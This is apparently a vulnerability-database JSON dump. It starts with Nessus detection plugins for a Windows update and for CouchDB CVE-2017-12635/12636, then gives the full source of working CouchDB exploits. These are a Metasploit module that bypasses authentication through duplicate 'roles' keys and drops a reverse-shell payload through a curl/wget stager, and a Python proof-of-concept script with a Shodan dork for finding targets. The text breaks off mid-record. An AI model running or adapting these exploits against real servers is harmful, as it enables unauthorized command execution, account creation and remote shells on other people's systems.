(CVE-2018-8495)\");\n # https://support.microsoft.com/en-us/help/4462919/windows-10-update-kb4462919\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ced2e3a3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462919.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462919');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462919])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:37:11", "bulletinFamily": "scanner", "description": "Apache CouchDB PMC reports :\n\nDatabase Administrator could achieve privilege escalation to the\naccount that CouchDB runs under, by abusing insufficient validation in\nthe HTTP API, escaping security controls implemented in previous\nreleases.", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL", "href": "https://www.tenable.com/plugins/nessus/111018", "published": "2018-07-12T00:00:00", "title": "FreeBSD : 
couchdb -- multiple vulnerabilities (1e54d140-8493-11e8-a795-0028f8d09152)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111018);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\", \"CVE-2018-8007\");\n\n script_name(english:\"FreeBSD : couchdb -- multiple vulnerabilities (1e54d140-8493-11e8-a795-0028f8d09152)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache CouchDB PMC reports :\n\nDatabase Administrator could achieve privilege escalation to the\naccount that CouchDB runs under, by abusing insufficient validation in\nthe HTTP API, escaping security controls implemented in previous\nreleases.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blog.couchdb.org/2018/07/10/cve-2018-8007/\"\n );\n # https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?236d3194\"\n );\n # https://lists.apache.org/thread.html/6fa798e96686b7b0013ec2088140d00aeb7d34487d3f5ad032af6934@%3Cdev.couchdb.apache.org%3E\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aab45713\"\n );\n # 
https://vuxml.freebsd.org/freebsd/1e54d140-8493-11e8-a795-0028f8d09152.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df4f4901\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache CouchDB Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:couchdb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"couchdb<1.7.2,2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-07-13T03:59:12", "bulletinFamily": "exploit", "description": "CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. 
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.", "modified": "2018-07-13T00:00:00", "published": "2018-07-13T00:00:00", "id": "1337DAY-ID-30713", "href": "https://0day.today/exploit/description/30713", "title": "Apache #CouchDB Arbitrary Command Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\r\n 'Description' => %q{\r\n CouchDB administrative users can configure the database server via HTTP(S).\r\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\r\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\r\n including downloading and executing scripts from the public internet.\r\n },\r\n 'Author' => [\r\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\r\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\r\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-12636'],\r\n ['CVE', '2017-12635'],\r\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\r\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\r\n ['URL', 'https://lists.apache.org/thread.html/[email\u00a0protected]%3Cdev.couchdb.apache.org%3E']\r\n ],\r\n 'DisclosureDate' => 'Apr 6 2016',\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\r\n 'CMDSTAGER::FLAVOR' => 'curl'\r\n },\r\n 'CmdStagerFlavor' => ['curl', 'wget'],\r\n 'Targets' => [\r\n ['Automatic', {}],\r\n ['Apache CouchDB version 1.x', {}],\r\n ['Apache CouchDB version 2.x', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(5984),\r\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),\r\n OptString.new('HttpUsername', [false, 'The username to login as']),\r\n OptString.new('HttpPassword', [false, 'The password to login with'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),\r\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n get_version\r\n version = Gem::Version.new(@version)\r\n return CheckCode::Unknown if version.version.empty?\r\n vprint_status \"Found CouchDB version #{version}\"\r\n\r\n return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n fail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version\r\n version = @version\r\n\r\n vprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass\r\n\r\n print_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\")\r\n @cmdstager = generate_cmdstager(\r\n temp: datastore['WritableDir'],\r\n file: File.basename(cmdstager_path)\r\n ).join(';')\r\n\r\n register_file_for_cleanup(cmdstager_path)\r\n\r\n if !datastore['Attempts'] || datastore['Attempts'] <= 0\r\n attempts = 1\r\n else\r\n attempts = datastore['Attempts']\r\n end\r\n\r\n 
attempts.times do |i|\r\n print_status(\"#{peer} - The #{i + 1} time to exploit\")\r\n send_payload(version)\r\n Rex.sleep(5)\r\n # break if we get the shell\r\n break if session_created?\r\n end\r\n end\r\n\r\n # CVE-2017-12635\r\n # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,\r\n # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization\r\n # for the newly created user.\r\n def auth_bypass\r\n username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n @auth = basic_auth(username, password)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"),\r\n 'method' => 'PUT',\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"})\r\n )\r\n\r\n if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def get_version\r\n @version = nil\r\n\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n rescue Rex::ConnectionError\r\n vprint_bad(\"#{peer} - Connection failed\")\r\n return false\r\n end\r\n\r\n unless res\r\n vprint_bad(\"#{peer} - No response, check if it is CouchDB. 
\")\r\n return false\r\n end\r\n\r\n if res && res.code == 401\r\n print_bad(\"#{peer} - Authentication required.\")\r\n return false\r\n end\r\n\r\n if res && res.code == 200\r\n res_json = res.get_json_document\r\n\r\n if res_json.empty?\r\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\r\n return false\r\n end\r\n\r\n @version = res_json['version'] if res_json['version']\r\n return true\r\n end\r\n\r\n vprint_warning(\"#{peer} - Version not found\")\r\n return true\r\n end\r\n\r\n def send_payload(version)\r\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\r\n\r\n version = Gem::Version.new(@version)\r\n if version.version.empty?\r\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\r\n # if target set Automatic, exploit failed.\r\n if target == targets[0]\r\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\r\n elsif target == targets[1]\r\n payload1\r\n elsif target == targets[2]\r\n payload2\r\n end\r\n elsif version < Gem::Version.new('1.7.0')\r\n payload1\r\n elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n payload2\r\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\r\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\r\n end\r\n end\r\n\r\n # Exploit with multi requests\r\n # payload1 is for the version of couchdb below 1.7.0\r\n def payload1\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 
\"/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\r\n )\r\n end\r\n\r\n # payload2 is for the version of couchdb below 2.1.1\r\n def payload2\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n\r\n node = res.get_json_document['all_nodes'][0]\r\n\r\n 
send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\r\n )\r\n end\r\n\r\n def cmdstager_path\r\n @cmdstager_path ||=\r\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\r\n end\r\n\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30713"}, {"lastseen": "2018-06-20T19:45:59", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category web applications", "modified": "2018-06-20T00:00:00", "published": 
"2018-06-20T00:00:00", "id": "1337DAY-ID-30608", "href": "https://0day.today/exploit/description/30608", "title": "Apache CouchDB < 2.1.0 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "# Title: Apache CouchDB < 2.1.0 - Remote Code Execution\r\n# Author: Cody Zacharias\r\n# Shodan Dork: port:5984\r\n# Vendor Homepage: http://couchdb.apache.org/\r\n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/\r\n# Version: <= 1.7.0 and 2.x - 2.1.0\r\n# Tested on: Debian\r\n# CVE : CVE-2017-12636\r\n# References: \r\n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\r\n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/\r\n \r\n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984\r\n \r\n#!/usr/bin/env python\r\nfrom requests.auth import HTTPBasicAuth\r\nimport argparse\r\nimport requests\r\nimport re\r\nimport sys\r\n \r\ndef getVersion():\r\n version = requests.get(args.host).json()[\"version\"]\r\n return version\r\n \r\ndef error(message):\r\n print(message)\r\n sys.exit(1)\r\n \r\ndef exploit(version):\r\n with requests.session() as session:\r\n session.headers = {\"Content-Type\": \"application/json\"}\r\n \r\n # Exploit privilege escalation\r\n if args.priv:\r\n try:\r\n payload = '{\"type\": \"user\", \"name\": \"'\r\n payload += args.user\r\n payload += '\", \"roles\": [\"_admin\"], \"roles\": [],'\r\n payload += '\"password\": \"' + args.password + '\"}'\r\n \r\n pr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user,\r\n data=payload)\r\n \r\n print(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create the user on remote host.\")\r\n \r\n session.auth = HTTPBasicAuth(args.user, args.password)\r\n \r\n # Create payload\r\n try:\r\n if version == 1:\r\n session.put(args.host + 
\"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError as e:\r\n error(\"[-] Unable to create command payload: \" + e)\r\n \r\n try:\r\n session.put(args.host + \"/god\")\r\n session.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}')\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create database.\")\r\n \r\n # Execute payload\r\n try:\r\n if version == 1:\r\n session.post(args.host + \"/god/_temp_view?limit=10\",\r\n data='{\"language\": \"cmd\", \"map\": \"\"}')\r\n else:\r\n session.post(args.host + \"/god/_design/zero\",\r\n data='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}')\r\n print(\"[+] Command executed: \" + args.cmd)\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to execute payload.\")\r\n \r\n print(\"[*] Cleaning up.\")\r\n \r\n # Cleanup database\r\n try:\r\n session.delete(args.host + \"/god\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove database.\")\r\n \r\n # Cleanup payload\r\n try:\r\n if version == 1:\r\n session.delete(args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove payload.\")\r\n \r\ndef main():\r\n version = getVersion()\r\n print(\"[*] Detected CouchDB Version \" + version)\r\n vv = version.replace(\".\", \"\")\r\n v = int(version[0])\r\n if v == 
1 and int(vv) <= 170:\r\n exploit(v)\r\n elif v == 2 and int(vv) < 211:\r\n exploit(v)\r\n else:\r\n print(\"[-] Version \" + version + \" not vulnerable.\")\r\n sys.exit(0)\r\n \r\nif __name__ == \"__main__\":\r\n ap = argparse.ArgumentParser(\r\n description=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\")\r\n ap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\")\r\n ap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\")\r\n ap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\",\r\n action=\"store_true\")\r\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\",\r\n default=\"guest\")\r\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\",\r\n default=\"guest\")\r\n args = ap.parse_args()\r\n main()\n\n# 0day.today [2018-06-20] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30608"}], "exploitdb": [{"lastseen": "2018-07-13T19:08:44", "bulletinFamily": "exploit", "description": "Apache CouchDB - Arbitrary Command Execution (Metasploit). CVE-2017-12635,CVE-2017-12636. Remote exploit for Linux platform. 
Tags: Metasploit Framework (MSF)...", "modified": "2018-07-13T00:00:00", "published": "2018-07-13T00:00:00", "id": "EDB-ID:45019", "href": "https://www.exploit-db.com/exploits/45019/", "type": "exploitdb", "title": "Apache CouchDB - Arbitrary Command Execution (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\r\n 'Description' => %q{\r\n CouchDB administrative users can configure the database server via HTTP(S).\r\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\r\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\r\n including downloading and executing scripts from the public internet.\r\n },\r\n 'Author' => [\r\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\r\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\r\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-12636'],\r\n ['CVE', '2017-12635'],\r\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\r\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\r\n ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']\r\n ],\r\n 'DisclosureDate' => 'Apr 6 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 
